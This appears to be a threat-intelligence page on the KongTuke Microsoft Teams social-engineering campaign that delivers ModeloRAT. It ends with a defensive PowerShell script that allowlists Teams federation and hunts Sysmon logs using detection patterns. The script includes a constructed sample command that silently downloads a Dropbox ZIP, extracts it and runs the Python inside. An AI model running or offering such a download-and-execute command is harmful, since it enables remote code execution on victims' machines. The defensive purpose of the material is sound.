KongTuke Microsoft Teams initial access campaign
Campaign
Summary
The KongTuke campaign now uses Microsoft Teams social engineering to gain persistent access to corporate networks, shortening initial compromise to under five minutes and raising the risk of follow-on abuse of that access. Operators pose as IT/help-desk staff and push victims to run a malicious PowerShell command that deploys ModeloRAT. The activity has run since at least April 2026 and has rotated through five Microsoft 365 tenants to evade blocking.
Related Happenings
Microsoft Teams on macOS repeated location-prompt service disruption
Service Disruption
First: 19.05.2026 19:10
Last: 19.05.2026 19:10
Sources 1
About this happening:
Microsoft confirmed a **Microsoft Teams on macOS** service disruption that causes **non-dismissible location prompts** for some users, interrupting normal app use for those who en...
Tycoon2FA device-code phishing campaign targeting Microsoft 365
Campaign
First: 17.05.2026 17:43
Last: 17.05.2026 17:43
Sources 1
About this happening:
The **Tycoon2FA** phishing operation added **device-code phishing** to hijack **Microsoft 365** accounts, expanding its ability to steal access tokens and reach email, calendar, a...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware Activity
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
How related:
The malware collects system and user information, captures screenshots, and can exfiltrate files from the host filesystem.
About this happening:
The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
Microsoft Windows 365 Office installation disruption
Service Disruption
First: 13.05.2026 14:53
Last: 13.05.2026 14:53
Sources 1
About this happening:
The **Windows 365** service update has introduced a **configuration change** that is blocking **Office downloads and installs** for some customers, disrupting access on cloud PCs....
MuddyWater Microsoft Teams social-engineering campaign with Chaos ransomware decoy
Campaign
First: 06.05.2026 16:02
Last: 06.05.2026 16:02
Sources 1
About this happening:
The **MuddyWater** campaign used **Microsoft Teams** social engineering and a **Chaos ransomware** decoy to gain access, steal credentials, and establish persistence. The operatio...
Timeline
14.05.2026 15:12 · 2 articles
KongTuke uses Microsoft Teams to social-engineer employees
Initial Disclosure
KongTuke uses Microsoft Teams social engineering against company employees, posing as IT and help-desk staff to persuade victims to run a malicious PowerShell command. The command downloads a ZIP from Dropbox, loads a portable WinPython environment from it, and launches ModeloRAT. The campaign has been active since at least April 2026 and has rotated through five Microsoft 365 tenants to evade blocking. Defenders can blunt the activity by restricting external Microsoft Teams federation to an allowlist of known domains and by hunting for the indicators of compromise.
Sources:
- KongTuke hackers now use Microsoft Teams for corporate breaches — www.bleepingcomputer.com — 14.05.2026 15:12
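The two defensive steps the disclosure recommends, restricting Teams external access to an allowlist and hunting for the PowerShell-to-Dropbox-to-portable-Python chain, as an added PowerShell example. This is not code from the BleepingComputer report or from Microsoft; it assumes a recent MicrosoftTeams PowerShell module (for the -AllowedDomainsAsAList parameter), Sysmon process-creation logging (event ID 1) on the endpoints, and placeholder domain names. The detection patterns encode the behaviour the report describes, not published indicators, and the sample command line at the end is constructed for illustration.

```powershell
#Requires -Modules MicrosoftTeams
# Added example, not the report's or Microsoft's code. Assumptions: MicrosoftTeams module
# version that supports -AllowedDomainsAsAList; Sysmon event ID 1 available; domain names
# and the sample command line below are placeholders/constructed, not real IOCs.

function Set-TeamsFederationAllowlist {
    param([Parameter(Mandatory)][string[]]$AllowedDomains)   # e.g. 'partner.example'
    Connect-MicrosoftTeams | Out-Null

    # Before: a default tenant typically federates with any external domain and with
    # consumer Teams accounts, which is what lets a freshly created M365 tenant
    # message your users as "IT support".
    $before = Get-CsTenantFederationConfiguration
    Write-Host ("Before: AllowFederatedUsers={0} AllowedDomains={1} AllowTeamsConsumer={2}" -f
        $before.AllowFederatedUsers, $before.AllowedDomains, $before.AllowTeamsConsumer)

    # After: keep federation on, but only for named domains, and block consumer and
    # Skype accounts. A rotated attacker tenant is never on the list, so tenant
    # rotation no longer buys them anything.
    Set-CsTenantFederationConfiguration `
        -AllowFederatedUsers $true `
        -AllowedDomainsAsAList $AllowedDomains `
        -AllowTeamsConsumer $false `
        -AllowTeamsConsumerInbound $false `
        -AllowPublicUsers $false

    Get-CsTenantFederationConfiguration
}

function Test-KongTukeStyleCommand {
    # Heuristic scoring of one process-creation event against the chain in the report:
    # PowerShell pulls a Dropbox-hosted ZIP, extracts it, runs a portable Python.
    # Patterns are assumptions to tune, not published indicators.
    param([string]$Image, [string]$CommandLine, [string]$ParentImage)

    if ($Image -notmatch '\\(powershell|pwsh)\.exe$') { return $null }
    $reasons = [System.Collections.Generic.List[string]]::new()

    if ($CommandLine -match 'dropbox(usercontent)?\.com')                      { $reasons.Add('Dropbox download') }
    if ($CommandLine -match '\.zip\b')                                        { $reasons.Add('ZIP payload') }
    if ($CommandLine -match 'Expand-Archive|ZipFile\]::Extract')              { $reasons.Add('archive extraction') }
    if ($CommandLine -match 'python(w)?\.exe|WinPython')                      { $reasons.Add('portable Python launch') }
    if ($CommandLine -match '-(w|windowstyle)\s+hidden|-enc(odedcommand)?\s') { $reasons.Add('hidden/encoded invocation') }
    if ($ParentImage -match 'ms-teams\.exe|Teams\.exe|explorer\.exe')         { $reasons.Add("parent $([IO.Path]::GetFileName($ParentImage))") }

    # Require two independent signals so a lone Dropbox download or a lone
    # Expand-Archive does not page anyone.
    if ($reasons.Count -ge 2) {
        return [pscustomobject]@{ Score = $reasons.Count; Reasons = ($reasons -join ', ') }
    }
    return $null
}

function Find-KongTukeStyleProcessEvents {
    param([datetime]$Since = (Get-Date).AddDays(-30))
    # Parse the Sysmon XML rather than relying on Properties[] positions, which shift
    # between Sysmon versions.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since } -ErrorAction Stop |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $hit = Test-KongTukeStyleCommand -Image $d.Image -CommandLine $d.CommandLine -ParentImage $d.ParentImage
        if ($hit) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Computer    = $x.Event.System.Computer
                User        = $d.User
                Score       = $hit.Score
                Reasons     = $hit.Reasons
                CommandLine = $d.CommandLine
            }
        }
    }
}

# Constructed sample (not a real command line from the campaign) to exercise the scorer
# offline; it should return Score 5 with Dropbox, ZIP, extraction, Python and hidden hits.
Test-KongTukeStyleCommand `
    -Image 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' `
    -ParentImage 'C:\Windows\explorer.exe' `
    -CommandLine 'powershell -w hidden -c "iwr https://www.dropbox.com/scl/fi/abc/setup.zip -OutFile $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip $env:TEMP\s; & $env:TEMP\s\python.exe $env:TEMP\s\m.py"'
```

Run `Set-TeamsFederationAllowlist -AllowedDomains 'partner.example','vendor.example'` once from a Teams administrator session and review the printed before/after state; `Find-KongTukeStyleProcessEvents | Format-Table` then runs the hunt on a host with Sysmon. The two-signal threshold is the knob to adjust: if your help desk legitimately scripts Dropbox downloads, raise it or drop the Dropbox pattern and lean on the portable-Python and parent-process signals instead.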